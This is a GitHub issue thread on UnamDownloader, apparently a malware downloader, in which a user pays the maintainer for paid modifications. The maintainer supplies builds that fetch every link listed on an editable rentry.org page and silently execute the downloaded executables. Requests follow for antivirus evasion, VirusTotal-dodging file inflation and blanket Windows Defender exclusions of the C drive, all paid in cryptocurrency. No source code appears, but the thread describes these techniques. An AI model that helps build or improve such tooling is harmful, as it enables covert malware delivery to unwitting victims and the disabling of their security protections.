### ISSUE TITLE
Can you update?

### ISSUE THREAD

**Issue by Napoleon941** [UnamSanctam/UnamDownloader#64]
First of all, can you add option to download from pastebin/rentry link? Thats extremely useful feature because all published builds can be easily changed.

Also when will you update this as its been 9 months and I see pretty many people have asked for the update.

Thank you for all the work you did, I will donate again soon!

**Comment by Napoleon941** [comment]
@UnamSanctam

**Comment by UnamSanctam** [comment]
I am working on it but haven't gotten the latest one to work with 32-bit yet, I am also in the process of integrating the new signature cloner feature directly in C#.

**Comment by Napoleon941** [comment]
Can you edit current one and make it download everything from raw url (rentry.org/.../raw) and name them and execute them? 

I will pay for it

**Comment by UnamSanctam** [comment]
Sure, only changing that is extremely simple, here is a build that does that:
[UnamDownloader.zip](https://github.com/UnamSanctam/UnamDownloader/files/10699017/UnamDownloader.zip)

**Comment by Napoleon941** [comment]
But its pretty much the same build as public release

**Comment by Napoleon941** [comment]
Where do I put link of rentry (where all the links are)

**Comment by Napoleon941** [comment]
Basically I would use such link (https://rentry.org/ssbbdw/raw) 
And it should download all the files there. So in future I can just edit rentry post and it will download new files

**Comment by UnamSanctam** [comment]
In the Download URL, I just replaced the normal functionally, but it won't do multiple files per link, for that the code would have to be quite a bit more advanced.

**Comment by Napoleon941** [comment]
Well I need to put 1 link and it downloads files from all the links on it, and execute them

**Comment by Napoleon941** [comment]
I can pay in advance, if you can make that

**Comment by Napoleon941** [comment]
So, do you think you can do that?

**Comment by Napoleon941** [comment]
Basically, there can be a button "download multiple files" and when I click on it, there would be place to put link such as rentry, and it would name them randomly (doesnt really matter) and execute them

**Comment by UnamSanctam** [comment]
Here is a build that splits the links using new line and then runs a for loop that downloads each file and gives them a random name, and then executes them all using another for loop. It only works for .exe files (since it has to be hard coded):
[UnamDownloader.zip](https://github.com/UnamSanctam/UnamDownloader/files/10699600/UnamDownloader.zip)

**Comment by Napoleon941** [comment]
Same eth address? 0x40E5bB6C61871776f062d296707Ab7B7aEfFe1Cd

**Comment by Napoleon941** [comment]
Also, can you give me any contact if you have (Not protonmail) where we can livechat (as we used to talk via discord in the past). I need you on a few more things :D

**Comment by UnamSanctam** [comment]
Yes I have the same wallet addresses, though you don't need to pay me for that one since it's still just a modification of the old (current) version.

>Also, can you give me any contact if you have (Not protonmail) where we can livechat (as we used to talk via discord in the past). I need you on a few more things :D

I haven't gotten one yet, I tried getting my Telegram back but it didn't work. Haven't decided what else to use yet.

**Comment by Napoleon941** [comment]
Sent a little donation then, thank you for the help :)

**Comment by Napoleon941** [comment]
Is there also posibility to remove detections on it, and to add bytes on infection (so file cannot be put on Virustotal? (over 650mb files cannot be scanned on virustotal)

**Comment by Napoleon941** [comment]
https://github.com/DevxStudio/Malware_Hide_Installer

This guy has implemented it I think

**Comment by Napoleon941** [comment]
Also it would be nice to be able to add entire C drive to exclusions in defender (with newer script for defender), so if downloader is undetected, it can add exclusions, and then download all the files so the files themselves won't require a crypt.

**Comment by Napoleon941** [comment]
I'm willing to pay for it all too, if you can do it privately (so detections doesnt grow that fast - that would happen if you upload it here)

**Comment by UnamSanctam** [comment]
Right now I'm working on version 1.7 of the downloader, I just need to get it working for 32-bit first.

**Comment by Napoleon941** [comment]
Tbh pretty much nobody uses it for 32 bit files

**Comment by shainodev** [comment]
> Tbh pretty much nobody uses it for 32 bit files

there are many paid tools that can only be built with 32bit

**Comment by Napoleon941** [comment]
@shainodev Aight then, my bad I guess

**Comment by samogost** [comment]
> Right now I'm working on version 1.7 of the downloader, I just need to get it working for 32-bit first.

great, but the "Run as Administrator" and "Add Windows Defender exclusions" features are broken 😐

**Comment by samogost** [comment]
> Right now I'm working on version 1.7 of the downloader, I just need to get it working for 32-bit first.

can you fix that broken feature?, i will donate

**Comment by UnamSanctam** [comment]
>great, but the "Run as Administrator" and "Add Windows Defender exclusions" features are broken 😐
>can you fix that broken feature?, i will donate

Broken? It should work fine, or do you just mean that the exclusion process gets a detection?

**Comment by samogost** [comment]
> > great, but the "Run as Administrator" and "Add Windows Defender exclusions" features are broken 😐
> > can you fix that broken feature?, i will donate
> 
> Broken? It should work fine, or do you just mean that the exclusion process gets a detection?

Yep
